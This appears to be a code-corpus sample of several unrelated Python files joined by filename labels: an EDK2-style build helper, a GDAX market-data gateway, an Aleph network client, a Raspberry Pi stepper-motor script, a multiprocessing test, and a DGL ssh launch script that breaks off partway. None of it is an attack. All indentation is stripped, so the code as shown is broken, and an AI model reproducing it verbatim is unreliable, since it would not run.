if self.SkuUsageType == SkuClass.SINGLE:
ArrayStr = "{0x0}"
else:
for skuname in self.AvailableSkuIds:
if skuname == "COMMON":
continue
while skuname != "DEFAULT":
ArrayStrList.append(hex(int(self.AvailableSkuIds[skuname])))
skuname = self.GetNextSkuId(skuname)
ArrayStrList.append("0x0")
ArrayStr = "{" + ",".join(ArrayStrList) + "}"
return ArrayStr
def __GetAvailableSkuIds(self):
return self.AvailableSkuIds
def __GetSystemSkuID(self):
if self.__SkuUsageType() == SkuClass.SINGLE:
if len(self.SkuIdSet) == 1:
return self.SkuIdSet[0]
else:
return self.SkuIdSet[0] if self.SkuIdSet[0] != 'DEFAULT' else self.SkuIdSet[1]
else:
return 'DEFAULT'
def __GetAvailableSkuIdNumber(self):
return self.SkuIdNumberSet
SystemSkuId = property(__GetSystemSkuID)
AvailableSkuIdSet = property(__GetAvailableSkuIds)
SkuUsageType = property(__SkuUsageType)
AvailableSkuIdNumSet = property(__GetAvailableSkuIdNumber)
#
# Pack a registry format GUID
#
def PackRegistryFormatGuid(Guid):
Guid = Guid.split('-')
return pack('=LHHBBBBBBBB',
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16)
)
def BuildOptionPcdValueFormat(TokenSpaceGuidCName, TokenCName, PcdDatumType, Value):
if PcdDatumType == 'VOID*':
if Value.startswith('L'):
if not Value[1]:
EdkLogger.error("build", FORMAT_INVALID, 'For Void* type PCD, when specify the Value in the command line, please use the following format: "string", L"string", H"{...}"')
Value = Value[0] + '"' + Value[1:] + '"'
elif Value.startswith('H'):
if not Value[1]:
EdkLogger.error("build", FORMAT_INVALID, 'For Void* type PCD, when specify the Value in the command line, please use the following format: "string", L"string", H"{...}"')
Value = Value[1:]
else:
if not Value[0]:
EdkLogger.error("build", FORMAT_INVALID, 'For Void* type PCD, when specify the Value in the command line, please use the following format: "string", L"string", H"{...}"')
Value = '"' + Value + '"'
IsValid, Cause = CheckPcdDatum(PcdDatumType, Value)
if not IsValid:
EdkLogger.error("build", FORMAT_INVALID, Cause, ExtraData="%s.%s" % (TokenSpaceGuidCName, TokenCName))
if PcdDatumType == 'BOOLEAN':
Value = Value.upper()
if Value == 'TRUE' or Value == '1':
Value = '1'
elif Value == 'FALSE' or Value == '0':
Value = '0'
return Value
## Get the integer value from string like "14U" or integer like 2
#
# @param Input The object that may be either a integer value or a string
#
# @retval Value The integer value that the input represents
#
def GetIntegerValue(Input):
if type(Input) in (int, long):
return Input
String = Input
if String.endswith("U"):
String = String[:-1]
if String.endswith("ULL"):
String = String[:-3]
if String.endswith("LL"):
String = String[:-2]
if String.startswith("0x") or String.startswith("0X"):
return int(String, 16)
elif String == '':
return 0
else:
return int(String)
##
#
# This acts like the main() function for the script, unless it is 'import'ed into another
# script.
#
if __name__ == '__main__':
pass
|
gdax.py | from bitfeeds.restful_api_socket import RESTfulApiSocket
from bitfeeds.ws_api_socket import WebSocketApiSocket
from bitfeeds.market_data import L2Depth, Trade
from bitfeeds.exchange import ExchangeGateway
from bitfeeds.instrument import Instrument
from bitfeeds.sql_storage_template import SqlStorageTemplate
from bitfeeds.util import Logger
import time
import threading
import json
from functools import partial
from datetime import datetime
class GdaxBroker(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_order_book_link(cls, instmt):
return "https://api.gdax.com/products/%s/book?level=2" % instmt.get_instmt_code()
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# Date time
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if type(bids[i][0]) != float else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if type(bids[i][1]) != float else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if type(asks[i][0]) != float else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if type(asks[i][1]) != float else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
raise Exception("parse_trade should not be called.")
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
raise Exception("get_trades should not be called.")
class ExchGwApiGdaxTrades(WebSocketApiSocket):
"""
Exchange socket
"""
def __init__(self):
"""
Constructor
"""
WebSocketApiSocket.__init__(self, 'Gdax')
@classmethod
def get_trades_timestamp_field_name(cls):
return 'time'
@classmethod
def get_trade_side_field_name(cls):
return 'side'
@classmethod
def get_trade_id_field_name(cls):
return 'trade_id'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'size'
@classmethod
def get_link(cls):
return 'wss://ws-feed.gdax.com'
@classmethod
def get_trades_subscription_string(cls, instmt):
return json.dumps({"type":"subscribe", "product_id": instmt.get_instmt_code()})
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
raise Exception("parse_l2_depth should not be called.")
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_side_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
# timestamp = raw[cls.get_trades_timestamp_field_name()]
# timestamp = timestamp.replace('T', ' ').replace('Z', '')
trade.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = Trade.parse_side(raw[cls.get_trade_side_field_name()])
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(raw[cls.get_trade_price_field_name()])
# Trade volume
trade.trade_volume = float(raw[cls.get_trade_volume_field_name()])
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
class ExchGwGdax(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_storages):
"""
Constructor
:param db_storage: Database storage
"""
ExchangeGateway.__init__(self, ExchGwApiGdaxTrades(), db_storages)
self.api_socket2 = ExchGwApiGdaxOrderBook()
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Gdax'
def on_open_handler(self, instmt, ws):
"""
Socket on open handler
:param instmt: Instrument
:param ws: Web socket
"""
Logger.info(self.__class__.__name__, "Instrument %s is subscribed in channel %s" % \
(instmt.get_instmt_code(), instmt.get_exchange_name()))
if not instmt.get_subscribed():
ws.send(self.api_socket.get_trades_subscription_string(instmt))
instmt.set_subscribed(True)
def on_close_handler(self, instmt, ws):
"""
Socket on close handler
:param instmt: Instrument
:param ws: Web socket
"""
Logger.info(self.__class__.__name__, "Instrument %s is unsubscribed in channel %s" % \
(instmt.get_instmt_code(), instmt.get_exchange_name()))
instmt.set_subscribed(False)
def on_message_handler(self, instmt, message):
"""
Incoming message handler
:param instmt: Instrument
:param message: Message
"""
keys = message.keys()
if 'type' in keys and 'product_id' in keys:
if message['type'] == "match":
if message["product_id"] == instmt.get_instmt_code():
# Filter out the initial subscriptions
trade = self.api_socket.parse_trade(instmt, message)
if trade.trade_id != instmt.get_exch_trade_id():
instmt.incr_trade_id()
instmt.set_exch_trade_id(trade.trade_id)
self.insert_trade(instmt, trade)
else:
# Never handler order book query here
pass
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket2.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(50))
instmt.set_prev_l2_depth(L2Depth(50))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
t_trades = self.api_socket.connect(url=self.api_socket.get_link(),
on_message_handler=partial(self.on_message_handler, instmt),
on_open_handler=partial(self.on_open_handler, instmt),
on_close_handler=partial(self.on_close_handler, instmt))
t_order_book = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t_order_book.start()
return [t_order_book, t_trades]
if __name__ == '__main__':
exchange_name = 'Gdax'
instmt_name = 'BTCUSD'
instmt_code = 'BTC-USD'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_storage = SqlStorageTemplate()
Logger.init_log()
exch = ExchGwGdax([db_storage])
td = exch.start(instmt)
|
asynchronous.py | """ This is the simplest aleph network client available.
"""
import asyncio
import hashlib
import json
import logging
import queue
import threading
import time
from abc import abstractmethod
from datetime import datetime
from enum import Enum
from functools import lru_cache
from yarl import URL
logger = logging.getLogger(__name__)
try:
import magic # type:ignore
except ImportError:
logger.warning("Could not import library 'magic'")
magic = None # type:ignore
from .conf import settings
from typing import Optional, Iterable, Union, Any, Dict, List, AsyncIterable
from typing_extensions import Protocol # Python < 3.8
import aiohttp
from aiohttp import ClientSession
from aleph_message.models.program import ProgramContent, Encoding # type: ignore
class StorageEnum(str, Enum):
ipfs = "ipfs"
storage = "storage"
# Use a protocol to avoid importing crypto libraries
class Account(Protocol):
CHAIN: str
CURVE: str
private_key: Union[str, bytes]
@abstractmethod
async def sign_message(self, message: Dict) -> Dict:
...
@abstractmethod
def get_address(self) -> str:
...
@abstractmethod
def get_public_key(self) -> str:
...
@abstractmethod
async def decrypt(self, content) -> bytes:
...
@lru_cache()
def _get_fallback_session(thread_id: Optional[int]) -> ClientSession:
if settings.API_UNIX_SOCKET:
connector = aiohttp.UnixConnector(path=settings.API_UNIX_SOCKET)
return aiohttp.ClientSession(connector=connector)
else:
return aiohttp.ClientSession()
def get_fallback_session() -> ClientSession:
thread_id = threading.get_native_id()
return _get_fallback_session(thread_id=thread_id)
def wrap_async(func):
def func_caller(*args, **kwargs):
loop = asyncio.get_event_loop()
return loop.run_until_complete(func(*args, **kwargs))
return func_caller
async def ipfs_push(
content, session: Optional[ClientSession] = None, api_server: str = settings.API_HOST
) -> str:
session = session or get_fallback_session()
async with session.post(f"{api_server}/api/v0/ipfs/add_json", json=content) as resp:
resp.raise_for_status()
return (await resp.json()).get("hash")
sync_ipfs_push = wrap_async(ipfs_push)
async def storage_push(
content, session: Optional[ClientSession] = None, api_server: str = settings.API_HOST
) -> str:
session = session or get_fallback_session()
async with session.post(
f"{api_server}/api/v0/storage/add_json", json=content
) as resp:
resp.raise_for_status()
return (await resp.json()).get("hash")
sync_storage_push = wrap_async(storage_push)
async def ipfs_push_file(
file_content,
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
) -> str:
session = session or get_fallback_session()
data = aiohttp.FormData()
data.add_field("file", file_content)
async with session.post(f"{api_server}/api/v0/ipfs/add_file", data=data) as resp:
resp.raise_for_status()
return (await resp.json()).get("hash")
sync_ipfs_push_file = wrap_async(ipfs_push_file)
async def storage_push_file(
file_content,
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
) -> str:
session = session or get_fallback_session()
data = aiohttp.FormData()
data.add_field("file", file_content)
async with session.post(f"{api_server}/api/v0/storage/add_file", data=data) as resp:
resp.raise_for_status()
return (await resp.json()).get("hash")
sync_storage_push_file = wrap_async(storage_push_file)
async def broadcast(
message, session: Optional[ClientSession] = None, api_server: str = settings.API_HOST
):
session = session or get_fallback_session()
async with session.post(
f"{api_server}/api/v0/ipfs/pubsub/pub",
json={"topic": "ALEPH-TEST", "data": json.dumps(message)},
) as response:
response.raise_for_status()
result = await response.json()
if result["status"] == "warning":
if 'failed' in result:
# Requires recent version of Pyaleph
logger.warning(f"Message failed to publish on {result.get('failed')}")
else:
logger.warning(f"Message failed to publish on IPFS and/or P2P")
return (result).get("value")
sync_broadcast = wrap_async(broadcast)
async def create_post(
account: Account,
post_content,
post_type: str,
ref=None,
address: Optional[str] = settings.ADDRESS_TO_USE,
channel: str = "TEST",
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
inline: bool = True,
storage_engine: str = "storage",
):
address = address or account.get_address()
post = {
"type": post_type,
"address": address,
"content": post_content,
"time": time.time(),
}
if ref is not None:
post["ref"] = ref
return await submit(
account,
post,
"POST",
channel=channel,
api_server=api_server,
session=session,
inline=inline,
storage_engine=storage_engine,
)
sync_create_post = wrap_async(create_post)
async def create_aggregate(
account: Account,
key,
content,
address: Optional[str] = settings.ADDRESS_TO_USE,
channel: str = "TEST",
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
):
address = address or account.get_address()
post = {"key": key, "address": address, "content": content, "time": time.time()}
return await submit(
account,
post,
"AGGREGATE",
channel=channel,
api_server=api_server,
session=session,
)
sync_create_aggregate = wrap_async(create_aggregate)
async def create_store(
account: Account,
address=settings.ADDRESS_TO_USE,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
guess_mime_type: bool = False,
ref: Optional[str] = None,
storage_engine="storage",
extra_fields: Optional[dict] = None,
channel: str = "TEST",
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
):
address = address or account.get_address()
extra_fields = extra_fields or {}
if file_hash is None:
if file_content is None:
raise ValueError("Please specify at least a file_content or a file_hash")
if storage_engine == "storage":
file_hash = await storage_push_file(
file_content, session=session, api_server=api_server
)
elif storage_engine == "ipfs":
file_hash = await ipfs_push_file(
file_content, session=session, api_server=api_server
)
else:
raise ValueError(f"Unknown storage engine: '{storage_engine}'")
if magic is None:
pass
elif guess_mime_type is True and "mime_type" not in extra_fields:
extra_fields["mime_type"] = magic.from_buffer(file_content, mime=True)
if ref:
extra_fields["ref"] = ref
store_content = {
"address": address,
"item_type": storage_engine,
"item_hash": file_hash,
"time": time.time(),
}
if extra_fields is not None:
store_content.update(extra_fields)
return await submit(
account,
store_content,
"STORE",
channel=channel,
api_server=api_server,
session=session,
inline=True,
)
sync_create_store = wrap_async(create_store)
async def create_program(
account: Account,
program_ref: str,
entrypoint: str,
runtime: str,
storage_engine: StorageEnum = StorageEnum.storage,
channel: str = "TEST",
address: Optional[str] = settings.ADDRESS_TO_USE,
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
memory: int = settings.DEFAULT_VM_MEMORY,
encoding: Encoding = Encoding.zip,
volumes: List[Dict] = None,
subscriptions: Optional[List[Dict]] = None,
):
volumes = volumes if volumes is not None else []
address = address or account.get_address()
# TODO: Check that program_ref, runtime and data_ref exist
## Register the different ways to trigger a VM
if subscriptions:
# Trigger on HTTP calls and on Aleph message subscriptions.
triggers = {
"http": True,
"message": subscriptions
}
else:
# Trigger on HTTP calls.
triggers = {"http": True}
content = ProgramContent(**{
"type": "vm-function",
"address": address,
"allow_amend": False,
"code": {
"encoding": encoding,
"entrypoint": entrypoint,
"ref": program_ref,
"use_latest": True,
},
"on": triggers,
"environment": {
"reproducible": False,
"internet": True,
"aleph_api": True,
},
"resources": {
"vcpus": 1,
"memory": memory,
"seconds": 30,
},
"runtime": {
"ref": runtime,
"use_latest": True,
"comment": "Aleph Alpine Linux with Python 3.8",
},
"volumes": volumes,
# {
# "mount": "/opt/venv",
# "ref": "5f31b0706f59404fad3d0bff97ef89ddf24da4761608ea0646329362c662ba51",
# "use_latest": False
# },
# {
# "comment": "Working data persisted on the VM supervisor, not available on other nodes",
# "mount": "/var/lib/sqlite",
# "name": "database",
# "persistence": "host",
# "size_mib": 5
# }
"time": time.time(),
})
return await submit(
account=account,
content=content.dict(exclude_none=True),
message_type="PROGRAM",
channel=channel,
api_server=api_server,
storage_engine=storage_engine,
session=session,
inline=True,
)
def sync_create_program(
account: Account,
program_ref: str,
entrypoint: str,
runtime: str,
storage_engine: StorageEnum = StorageEnum.storage,
channel: str = "TEST",
address: Optional[str] = settings.ADDRESS_TO_USE,
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
memory: int = settings.DEFAULT_VM_MEMORY,
encoding: Encoding = Encoding.zip,
volumes: List[Dict] = None,
subscriptions: Optional[List[Dict]] = None,
):
return wrap_async(create_program)(
account=account,
program_ref=program_ref,
entrypoint=entrypoint,
runtime=runtime,
storage_engine=storage_engine,
channel=channel,
address=address,
session=session,
api_server=api_server,
memory=memory,
encoding=encoding,
volumes=volumes,
subscriptions=subscriptions,
)
async def submit(
account: Account,
content: dict,
message_type: str,
channel: str = "IOT_TEST",
api_server: str = settings.API_HOST,
storage_engine: str = "storage",
session: Optional[ClientSession] = None,
inline: bool = True,
):
message: Dict[str, Any] = {
#'item_hash': ipfs_hash,
"chain": account.CHAIN,
"channel": channel,
"sender": account.get_address(),
"type": message_type,
"time": time.time(),
}
item_content: str = json.dumps(content, separators=(",", ":"))
if inline and (len(item_content) < 50000):
message["item_content"] = item_content
h = hashlib.sha256()
h.update(message["item_content"].encode("utf-8"))
message["item_hash"] = h.hexdigest()
else:
if storage_engine == "ipfs":
message["item_hash"] = await ipfs_push(content, api_server=api_server)
else: # storage
message["item_hash"] = await storage_push(content, api_server=api_server)
message = await account.sign_message(message)
await broadcast(message, session=session, api_server=api_server)
# let's add the content to the object so users can access it.
message["content"] = content
return message
sync_submit = wrap_async(submit)
async def fetch_aggregate(
address: str,
key,
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
):
session = session or get_fallback_session()
async with session.get(
f"{api_server}/api/v0/aggregates/{address}.json?keys={key}"
) as resp:
return (await resp.json()).get("data", dict()).get(key)
sync_fetch_aggregate = wrap_async(fetch_aggregate)
async def fetch_aggregates(
address: str,
keys: Optional[Iterable[str]] = None,
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
) -> Dict[str, Dict]:
session = session or get_fallback_session()
keys_str = ",".join(keys) if keys else ""
query_string = f"?keys={keys_str}" if keys else ""
async with session.get(
f"{api_server}/api/v0/aggregates/{address}.json{query_string}"
) as resp:
return (await resp.json()).get("data", dict())
sync_fetch_aggregates = wrap_async(fetch_aggregates)
async def get_posts(
pagination: int = 200,
page: int = 1,
types: Optional[Iterable[str]] = None,
refs: Optional[Iterable[str]] = None,
addresses: Optional[Iterable[str]] = None,
tags: Optional[Iterable[str]] = None,
hashes: Optional[Iterable[str]] = None,
channels: Optional[Iterable[str]] = None,
start_date: Optional[Union[datetime, float]] = None,
end_date: Optional[Union[datetime, float]] = None,
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
):
session = session or get_fallback_session()
params: Dict[str, Any] = dict(pagination=pagination, page=page)
if types is not None:
params["types"] = ",".join(types)
if refs is not None:
params["refs"] = ",".join(refs)
if addresses is not None:
params["addresses"] = ",".join(addresses)
if tags is not None:
params["tags"] = ",".join(tags)
if hashes is not None:
params["hashes"] = ",".join(hashes)
if channels is not None:
params["channels"] = ",".join(channels)
if start_date is not None:
if not isinstance(start_date, float) and hasattr(start_date, "timestamp"):
start_date = start_date.timestamp()
params["start_date"] = start_date
if end_date is not None:
if not isinstance(end_date, float) and hasattr(start_date, "timestamp"):
end_date = end_date.timestamp()
params["end_date"] = end_date
async with session.get(f"{api_server}/api/v0/posts.json", params=params) as resp:
resp.raise_for_status()
return await resp.json()
sync_get_posts = wrap_async(get_posts)
async def get_messages(
pagination: int = 200,
page: int = 1,
message_type: Optional[str] = None,
content_types: Optional[Iterable[str]] = None,
refs: Optional[Iterable[str]] = None,
addresses: Optional[Iterable[str]] = None,
tags: Optional[Iterable[str]] = None,
hashes: Optional[Iterable[str]] = None,
channels: Optional[Iterable[str]] = None,
start_date: Optional[Union[datetime, float]] = None,
end_date: Optional[Union[datetime, float]] = None,
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
) -> Dict[str, Any]:
session = session or get_fallback_session()
params: Dict[str, Any] = dict(pagination=pagination, page=page)
if message_type is not None:
params["msgType"] = message_type
if content_types is not None:
params["contentTypes"] = ",".join(content_types)
if refs is not None:
params["refs"] = ",".join(refs)
if addresses is not None:
params["addresses"] = ",".join(addresses)
if tags is not None:
params["tags"] = ",".join(tags)
if hashes is not None:
params["hashes"] = ",".join(hashes)
if channels is not None:
params["channels"] = ",".join(channels)
if start_date is not None:
if not isinstance(start_date, float) and hasattr(start_date, "timestamp"):
start_date = start_date.timestamp()
params["start_date"] = start_date
if end_date is not None:
if not isinstance(end_date, float) and hasattr(start_date, "timestamp"):
end_date = end_date.timestamp()
params["end_date"] = end_date
async with session.get(f"{api_server}/api/v0/messages.json", params=params) as resp:
resp.raise_for_status()
return await resp.json()
sync_get_messages = wrap_async(get_messages)
async def watch_messages(
pagination: int = 200,
page: int = 1,
message_type: Optional[str] = None,
content_types: Optional[Iterable[str]] = None,
refs: Optional[Iterable[str]] = None,
addresses: Optional[Iterable[str]] = None,
tags: Optional[Iterable[str]] = None,
hashes: Optional[Iterable[str]] = None,
channels: Optional[Iterable[str]] = None,
start_date: Optional[Union[datetime, float]] = None,
end_date: Optional[Union[datetime, float]] = None,
session: Optional[ClientSession] = None,
api_server: str = settings.API_HOST,
) -> AsyncIterable[Dict[str, Any]]:
"""
Iterate over current and future matching messages asynchronously.
"""
session = session or get_fallback_session()
params: Dict[str, Any] = dict(pagination=pagination, page=page)
if message_type is not None:
params["msgType"] = message_type
if content_types is not None:
params["contentTypes"] = ",".join(content_types)
if refs is not None:
params["refs"] = ",".join(refs)
if addresses is not None:
params["addresses"] = ",".join(addresses)
if tags is not None:
params["tags"] = ",".join(tags)
if hashes is not None:
params["hashes"] = ",".join(hashes)
if channels is not None:
params["channels"] = ",".join(channels)
if start_date is not None:
if not isinstance(start_date, float) and hasattr(start_date, "timestamp"):
start_date = start_date.timestamp()
params["start_date"] = start_date
if end_date is not None:
if not isinstance(end_date, float) and hasattr(start_date, "timestamp"):
end_date = end_date.timestamp()
params["end_date"] = end_date
# FIXME:
# We build the URL manually since aiohttp.ClientSession.ws_connect does not support
# the `params` argument at the moment.
# Upstream issue: https://github.com/aio-libs/aiohttp/issues/5868
# Upstream pull request: https://github.com/aio-libs/aiohttp/pull/5869
url = URL(f"{api_server}/api/ws0/messages").with_query(params)
async with session.ws_connect(url) as ws:
logger.debug("Websocket connected")
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
if msg.data == 'close cmd':
await ws.close()
break
else:
yield json.loads(msg.data)
elif msg.type == aiohttp.WSMsgType.ERROR:
break
async def _run_watch_messages(coroutine: AsyncIterable, output_queue: queue.Queue):
"""Forward messages from the coroutine to the synchronous queue"""
async for message in coroutine:
output_queue.put(message)
def _start_run_watch_messages(output_queue: queue.Queue, args: List, kwargs: Dict):
"""Thread entrypoint to run the `watch_messages` asynchronous generator in a thread.
"""
watcher = watch_messages(*args, **kwargs)
runner = _run_watch_messages(watcher, output_queue)
asyncio.new_event_loop().run_until_complete(runner)
def sync_watch_messages(*args, **kwargs):
"""
Iterate over current and future matching messages synchronously.
Runs the `watch_messages` asynchronous generator in a thread.
"""
output_queue = queue.Queue()
thread = threading.Thread(target=_start_run_watch_messages, args=(output_queue, args, kwargs))
thread.start()
while True:
yield output_queue.get()
|
threading_example.py | import RPi.GPIO as GPIO
from time import sleep
from mpu6050 import mpu6050
from threading import Thread
# Sensor variables
global x
global y
global sensor
sensor = mpu6050(0x68)
# Direction pin from controller
DIR1 = 37
DIR2 = 29
# Step pin from controller
STEP1 = 35
STEP2 = 21
# 0/1 used to signify clockwise or counterclockwise
CW =1
CCW = 1
# Setup pin layout on PI
GPIO.setmode(GPIO.BCM)
# Establish Pins in software
GPIO.setup(DIR1, GPIO.OUT)
GPIO.setup(STEP1, GPIO.OUT)
GPIO.setup(DIR2, GPIO.OUT)
GPIO.setup(STEP2, GPIO.OUT)
# move function for the stepper motors
def move(step_pin, dir_pin, direction, speed, distance):
global GPIO
# Esablish the direction you want to go
GPIO.output(dir_pin,direction)
# Run for 440 steps. This will change based on how you set you controller
for i in range(distance):
# Set one coil winding to high
GPIO.output(step_pin,GPIO.HIGH)
# Allow it to get there.
sleep(speed) # Dictates how fast stepper motor will run
# Set coil winding to low
GPIO.output(step_pin,GPIO.LOW)
sleep(speed) # Dictates how fast stepper motor will run
# set the duration
#
# def get_mpu_data():
#
# global x
# global y
# global sensor
#
# while True:
# accelerometer_data = sensor.get_accel_data()
# x = accelerometer_data['x']
# y = accelerometer_data['y']
#
#
# data = Thread(target=get_mpu_data)
# #Start Thread
# data.start()
try:
while True:
print("Move x")
move(STEP1, DIR1, CCW, 0.1, 2000)
sleep(1)
# # Run forever
# while True:
# if (x > 3):
# move(STEP1, DIR1, CCW, 0.005, 500)
# if (x < -3):
# move(STEP1, DIR1, CW, 0.005, 500)
# if (y > 3):
# move(STEP2, DIR2, CCW, 0.005, 500)
# if (y < -3):
# move(STEP2, DIR2, CW, 0.005, 500)
#
# Once finished clean everything up
except KeyboardInterrupt:
print("cleanup")
finally:
GPIO.cleanup()
|
multiprocessingTest.py | from multiprocessing import Process, Value
import os, time, random
# 写数据进程执行的代码:
def write(q):
print('Process to write: %s' % q.value)
q.value=8
print('Process to write: %s' % q.value)
while q.value != 10:
time.sleep(5)
print('Process to write: %s' % q.value)
def runParentProcess():
q = Value("i", 5)
pw = Process(target=write, args=(q,))
# 启动子进程pw,写入:
pw.start()
# 等待pw结束:
time.sleep(30)
q.value = 10
pw.join()
# pr进程里是死循环,无法等待其结束,只能强行终止:
#pr.terminate()
if __name__=='__main__':
runParentProcess()
|
launch.py | """Launching tool for DGL distributed training"""
import os
import stat
import sys
import subprocess
import argparse
import signal
import logging
import time
from threading import Thread
def execute_remote(cmd, ip, thread_list):
"""execute command line on remote machine via ssh"""
cmd = 'ssh -o StrictHostKeyChecking=no ' + ip + ' \'' + cmd + '\''
# thread func to run the job
def run(cmd):
subprocess.check_call(cmd, shell = True)
thread = Thread(target = run, args=(cmd,))
thread.setDaemon(True)
thread.start()
thread_list.append(thread)
def submit_jobs(args, udf_command):
"""Submit distributed jobs (server and client processes) via ssh"""
hosts = []
thread_list = []
server_count_per_machine = 0
ip_config = args.workspace + '/' + args.ip_config
with open(ip_config) as f:
for line in f:
ip, port, count = line.strip().split(' ')
port = int(port)
count = int(count)
server_count_per_machine = count
hosts.append((ip, port))
assert args.num_client % len(hosts) == 0
client_count_per_machine = int(args.num_client / len(hosts))
# launch server tasks
server_cmd = 'DGL_ROLE=server'
server_cmd = server_cmd + ' ' + 'DGL_NUM_CLIENT=' + str(args.num_client)
server_cmd = server_cmd + ' ' + 'DGL_CONF_PATH=' + str(args.conf_path)
server_cmd = server_cmd + ' ' + 'DGL_IP_CONFIG=' + str(args.ip_config)
for i in range(len(hosts)*server_count_per_machine):
ip, _ = hosts[int(i / server_count_per_machine)]
cmd = server_cmd + ' ' + 'DGL_SERVER_ID=' + str(i)
cmd = cmd + ' ' + udf_command
cmd = 'cd ' + str(args.workspace) + '; ' + cmd
execute_remote(cmd, ip, thread_list)
# launch client tasks
client_cmd = 'DGL_DIST_MODE="distributed" DGL_ROLE=client'
client_cmd = client_cmd + ' ' + 'DGL_NUM_CLIENT=' + str(args.num_client)
client_cmd = client_cmd + ' ' + 'DGL_CONF_PATH=' + str(args.conf_path)
client_cmd = client_cmd + ' ' + 'DGL_IP_CONFIG=' + str(args.ip_config)
if os.environ.get('OMP_NUM_THREADS') is not None:
client_cmd = client_cmd + ' ' + 'OMP_NUM_THREADS=' + os.environ.get('OMP_NUM_THREADS')
if os.environ.get('PYTHONPATH') is not None:
client_cmd = client_cmd + ' ' + 'PYTHONPATH=' + os.environ.get('PYTHONPATH')
torch_cmd = '-m torch.distributed.launch'
torch_cmd = torch_cmd + ' ' + '--nproc_per_node=' + str(client_count_per_machine)
torch_cmd = torch_cmd + ' ' + '--nnodes=' + str(len(hosts))
torch_cmd = torch_cmd + ' ' + '--node_rank=' + str(0)
torch_cmd = torch_cmd + ' ' + '--master_addr=' + str(hosts[0][0])
torch_cmd = torch_cmd + ' ' + '--master_port=' + str(1234)
for node_id, host in enumerate(hosts):
ip, _ = host
new_torch_cmd = torch_cmd.replace('node_rank=0', 'node_rank='+str(node_id))
new_udf_command = udf_command.replace('python3', 'python3 ' + new_torch_cmd)
cmd = client_cmd + ' ' + new_udf_command
cmd = 'cd ' + str(args.workspace) + '; ' + cmd
